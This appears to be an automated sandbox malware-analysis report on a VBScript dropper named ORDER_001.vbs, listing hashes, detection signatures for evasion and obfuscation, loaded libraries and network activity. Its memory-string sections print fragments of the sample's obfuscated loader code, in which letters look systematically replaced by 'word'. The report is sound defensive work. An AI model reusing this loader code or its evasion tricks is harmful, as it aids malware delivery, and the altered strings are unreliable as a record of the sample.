Windows Analysis Report
ORDER_001.vbs

Overview

General Information

Sample name: ORDER_001.vbs
Analysis ID: 1523163
MD5: 2da95c45a16570fe5a54d7d69c0a4660
SHA1: 47686ceac80fef7a3b5402ca2f72e09d1b5827f8
SHA256: 3e18c135dee79e6de78802901e67f1115d4c39ba4a197981543169fed415181f
Tags: vbsuser-abuse_ch
Infos:

Detection

Score: 22
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000002.4617158163.0000017068F51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5b77d2ef9b
Java / VBScript file with very long strings (likely obfuscated code)
Source: ORDER_001.vbs Initial sample: Strings found which are bigger than 50
Source: wscript.exe, 00000000.00000002.4617158163.0000017068F66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n.aeCo.HusBapTol.aiUnwordE (Tr$SaVSyaUdlExiL dUdaS wordAdaCebU l AeM ).r ');Rewordfrdighedsflelsens (Mewordropolens 'Tr[SvNSyeDaword,e.TuSTee urwordxword . covSwordi rcNeeB PC oNoiNonA wordGuMGra wordnwordxword . c,aThgude .rAi]Sn:Ac:ArSsaeeycwordxword . couTarwordxword . cuiMawordWiyKaP,ar no Sword,ro cIno OlB. Du= o Se[NoNSveAfwordT..wordrSVeeS c ruQur BiBywordDiyLePO r eoSkword xoPrcdeo flBjT y,opM e ]Di:R : TU l.ys o1.g2 H ');$Evaporeringerne=$shearer[0];$Syresalwords=(Mewordropolens 'Un$Big ULsao,pbB.A Elgo: nHIny ,g rSwo pUnhBaYLswordkoeIn=TiNR ESwordwwordxword . ci- eO MBDojW,e LC iwordSh a sTiy ,sDiwordMueNoMSo.SlnBje TSh.PhW BeUnb,acAnL ,I .EUbNPeTCy ');Rewordfrdighedsflelsens ($Syresalwords);Rewordfrdighedsflelsens (Mewordropolens ' G$ H UyCogNorGroUdp hwordxword . c ySdwordIneRe.ceHM eMia SdA,eInrBes.i[S.$ lSHeaBhmkrm Te in Ls HwordBiy kDenMui nJegIneD,niwordsQu] a=S $ DApians mpByo osS.i Rwordwordxword . c,i aob,n sP.nU,uS mnam SeO r ,ewordxword . cor iwordxword . conN gSysre ');$Nonconfirmawordion118=Mewordropolens 'S,$.lHKoyGugM r aoB p vh Cy ,word reHe. eDAfoA wTinRel o Za Pd pwordxword . c ai,elCre n(La$ nERev eaP,p oSvr ce Trdui On Mg ,ePorB nCeeU , a$MaA,rlSusI iMadJeiL.gUfh,eeS dals akPirReamivSee anineA ) D ';$Alsidighedskravene=$Plisshrerne;Rewordfrdighedsflelsens (Mewordropolens 'Re$DeG rLB,oDobTha .LQu: IPUneTeaS,RUnL SiUdkUnEd =sp(CeTudEchsUnwordUn-KoPSwordaDkwordReHCr wordxword . c$ iaRel aS.qI D eI mGLihBeeGrd DSChKP,r BAi v rESpnSwordEBe)Op ');while (!$Pearlike) {Rewordfrdighedsflelsens (Mewordropolens 'de$HogUrlHuoTab,ya Tl s:BaO uwordxword . ciwordArcS.h eaSkr CmGae fd a=A $BrwordSmr HuEpeM, ') ;Rewordfrdighedsflelsens $Nonconfirmawordion118;Rewordfrdighedsflelsens (Mewordropolens 'O S ,word saD r .wordmi-V SU.l ,eAdeDipw S4 ');Rewordfrdighedsflelsens (MewordroporB nCe
Source: wscript.exe, 00000000.00000003.2143121862.000001706B056000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129902609.0000017068F23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2145657324.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130162482.000001706ADEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.4617443544.000001706AEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2146391333.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2145248851.000001706B05C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129723315.000001706ADC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.4617568963.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2143761707.000001706B05B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129864207.000001706ADC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Arbejdsvgring = Arbejdsvgring & ".Sln"
Source: wscript.exe, 00000000.00000003.2143247519.000001706B037000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .Sln@
Source: wscript.exe, 00000000.00000002.4617443544.000001706AF87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rdropolens ' y$seg kl ,oHyb aaS lIn:Tas ShBreGaa rrU,eUnrSk= .$DaEBhvcoaB,pS.oSnr oeCorSpiHjnUng ,eArr en.aeCo.HusBapTol.aiUnwordE (Tr$SaVSyaUdlExiL dUdaS wordAdaCebU l AeM ).r ');Rewordfrdighedsflelsens (Mewordropolens 'Tr[SvNSyeDaword,e.TuSTee urwordxword . covSwordi rcNeeB PC oNoiNonA wordGuMGra wordnwordxword . c,aThgude .rAi]Sn:Ac:ArSsaeeycwordxword . couTarwordxword . cuiMawordWiyKaP,ar no Sword,ro cIno OlB. Du= o Se[NoNSveAfwordT..wordrSVeeS c ruQur BiBywordDiyLePO r eoSkword xoPrcdeo flBjT y,opM e ]Di:R : TU l.ys o1.g2 H ');$Evaporeringerne=$shearer[0];$Syresalwords=(Mewordropolens 'Un$Big ULsao,pbB.A Elgo: nHIny ,g rSwo pUnhBaYLswordkoeIn=TiNR ESwordwwordxword . ci- eO MBDojW,e LC iwordSh a sTiy ,sDiwordMueNoMSo.SlnBje TSh.PhW BeUnb,acAnL ,I .EUbNPeTCy ');Rewordfrdighedsflelsens ($Syresalwords);Rewordfrdighedsflelsens (Mewordropolens ' G$ H UyCogNorGroUdp hwordxword . c ySdwordIneRe.ceHM eMia SdA,eInrBes.i[S.$ lSHeaBhmkrm Te in Ls HwordBiy kDenMui nJegIneD,niwordsQu] a=S $ DApians mpByo osS.i Rwordwordxword . c,i aob,n sP.nU,uS mnam SeO r ,ewordxword . cor iwordxword . conN gSysre ');$Nonconfirmawordion118=Mewordropolens 'S,$.lHKoyGugM r aoB p vh Cy ,word reHe. eDAfoA wTinRel o Za Pd pwordxword . c ai,elCre n(La$ nERev eaP,p oSvr ce Trdui On Mg ,ePorB nCeeU , a$MaA,rlSusI iMadJeiL.gUfh,eeS dals akPirReamivSee anineA ) D ';$Alsidighedskravene=$Plisshrerne;Rewordfrdighedsflelsens (Mewordropolens 'Re$DeG rLB,oDobTha .LQu: IPUneTeaS,RUnL SiUdkUnEd =sp(CeTudEchsUnwordUn-KoPSwordaDkwordReHCr wordxword . c$ iaRel aS.qI D eI mGLihBeeGrd DSChKP,r BAi v rESpnSwordEBe)Op ');while (!$Pearlike) {Rewordfrdighedsflelsens (Mewordropolens 'de$HogUrlHuoTab,ya Tl s:BaO uwordxword . ciwordArcS.h eaSkr CmGae fd a=A $BrwordSmr HuEpeM, ') ;Rewordfrdighedsflelsens $Nonconfirmawordion118;Rewordfrdighedsflelsens (Mewordropolens 'O S ,word saD r .wordmi-V SU.l ,eAdeDipw S4 ');Rewordfrdighedsflelsens (Mewordropolens 'Nu$ Kg nlBro ebBraUmlG :DeP geS awordxword . clrHalRei Sk .eB =wordxword . c.(BiTpoe IsS word e- UPPoa wordxword . cword Sh L $D AOvlNos iG dSpiS gS h wordegid.esBokPrrRea SvCrepanCheUn)To ') ;Rewordfrdighedsflelsens (Mewordropolens 'Te$Crg.vl voK.bwordxword . cia SlPr: SPoword,naChbDelLee aswordewordN oDelO eCun m=Ta$G gR,l eoSvbP,a GlKl:.owordxword . cBeiwordxword . c l,mnr,u kmSam Se,rrUneAywordwordes I+S +Tw%As$Mos phNeeBoaCorAme lrSk. cAnoLouPin Iwordwordxword . c ') ;$Evaporeringerne=$shearer[$Swordableswordolen];}$Hovedhensynenes=288326;$wordxword . culdwordidsbeskfwordigelse=28742;Rewordfrdighedsflelsens (Mewordropolens '.h$Leg .lSuowordxword . crbOvaAll.e:GaKUpo TlHeoS nHai,os RaPowordUnoPyrSworde BnBesBr Co= B OvG heL word -IsCR o SnLewordDieA n owordTo S$AfA elknsO,i dSpiCrgI ha eD dM.sTokPhr wordxword . ca,ivN eExnPse e ');Rewordfrdighedsflelsens (Mewordropolens 'Zo$SwordgAml SoUnb Ca.wordl E:D O BuSuword,riH s sL uTre dGr S =Ra a[OvS RySos,iwordBrePamSk. mCC.o onDiv ,eL,rKnwordCl]Sword:wordxword . cr:c.wo
Source: classification engine Classification label: sus22.winVBS@1/2@0/0
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER_001.vbs"
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1460 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: wscript.exe, 00000000.00000002.4617158163.0000017068F66000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.4617443544.000001706AF87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2141288275.000001706AF87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142292945.000001706AF87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2141871319.000001706AF87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1523163 Sample: ORDER_001.vbs Startdate: 01/10/2024 Architecture: WINDOWS Score: 22 7 Sigma detected: WScript or CScript Dropper 2->7 5 wscript.exe 2->5         started        process3
No contacted IP infos

Contacted Domains

Name IP Active
windowsupdatebg.s.llnwi.net 87.248.204.0 true